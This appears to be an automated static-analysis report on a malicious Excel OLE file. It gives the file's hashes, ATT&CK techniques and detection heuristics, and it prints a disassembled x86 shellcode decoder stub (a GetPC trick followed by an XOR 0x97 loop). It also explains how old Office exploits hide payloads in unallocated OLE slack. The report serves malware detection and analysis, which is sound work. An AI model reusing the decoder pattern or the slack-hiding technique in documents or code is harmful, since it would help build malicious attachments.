Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 db9b961ead5f7579…

MALICIOUS

Office (OLE)

176.0 KB Created: 1996-12-17 01:32:42 Authoring application: Microsoft Excel First seen: 2015-09-15
MD5: 02a2ef5e70f0e167c57269393bd02c90 SHA-1: f0ad527f153db45ed2dd219c79f919266a10c283 SHA-256: db9b961ead5f75795b77fda2ad40f8f4fdb2ee153c4acdd7e8392affbc485188
120 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The file is an OLE document with significant appended payload bytes and high entropy, indicating it likely contains an embedded executable. Heuristics for OLE slack anomaly and appended payload confirm this structure. The presence of an exploit stub suggests it's designed to execute arbitrary code, likely as a spearphishing attachment.

Heuristics 3

  • x86 GetPC stub (CALL $+5; POP EDI) high SC_GETPC_CALL
    x86 GetPC stub (CALL $+5; POP EDI)
    Disassembly
    Attempted x86 opcode disassembly
    00000D11  e800000000        call 0xd16
00000D16  5f                pop edi
00000D17  83c729            add edi, 0x29
00000D1A  66bbc65f          mov bx, 0x5fc6
00000D1E  57                push edi
00000D1F  5e                pop esi
00000D20  eb10              jmp 0xd32
00000D22  5a                pop edx
00000D23  4a                dec edx
00000D24  33c9              xor ecx, ecx
00000D26  66b9ad02          mov cx, 0x2ad
00000D2A  80340a97          xor byte ptr [edx + ecx], 0x97
00000D2E  e2fa              loop 0xd2a
00000D30  eb05              jmp 0xd37
00000D32  e8ebffffff        call 0xd22
00000D37  a4                movsb byte ptr es:[edi], byte ptr [esi]
00000D38  57                push edi
00000D39  f31cd7            sbb al, 0xd7
00000D3C  a7                cmpsd dword ptr [esi], dword ptr es:[edi]
00000D3D  a91cd79ba9        test eax, 0xa99bd71c
00000D42  1cd7              sbb al, 0xd7
00000D44  8ba91ce79fa9      mov ebp, dword ptr [ecx - 0x566018e4]
00000D4A  1cef              sbb al, 0xef
00000D4C  b7a9              mov bh, 0xa9
00000D4E  1c97              sbb al, 0x97
00000D50  f1                int1
00000D51  a914e88f97        test eax, 0x978fe814
00000D56  e27a              loop 0xdd2
00000D58  16                push ss
00000D59  7b97              jnp 0xcf2
00000D5B  93                xchg ebx, eax
00000D5C  97                xchg edi, eax
00000D5D  97                xchg edi, eax
00000D5E  1c6b              sbb al, 0x6b
00000D60  a950901248        test eax, 0x48129050
00000D65  382ca9            cmp byte ptr [ecx + ebp*4], ch
00000D68  50                push eax
00000D69  d09319849d3b      rcl byte ptr [ebx + 0x3b9d8419]
00000D6F  a9                .byte 0xa9
00000D70  50                push eax
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 180,245 bytes but its declared streams total only 20,469 bytes — 159,776 bytes (89%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • OLE file has appended executable-looking payload bytes high OLE_APPENDED_PAYLOAD
    OLE compound file contains a large high-entropy region beyond the declared major streams and that region includes shellcode, PE, or loader API markers. This is a payload-carrier signal, not a specific CVE attribution by itself.

Open this report in the interactive analyzer, or submit your own file for analysis.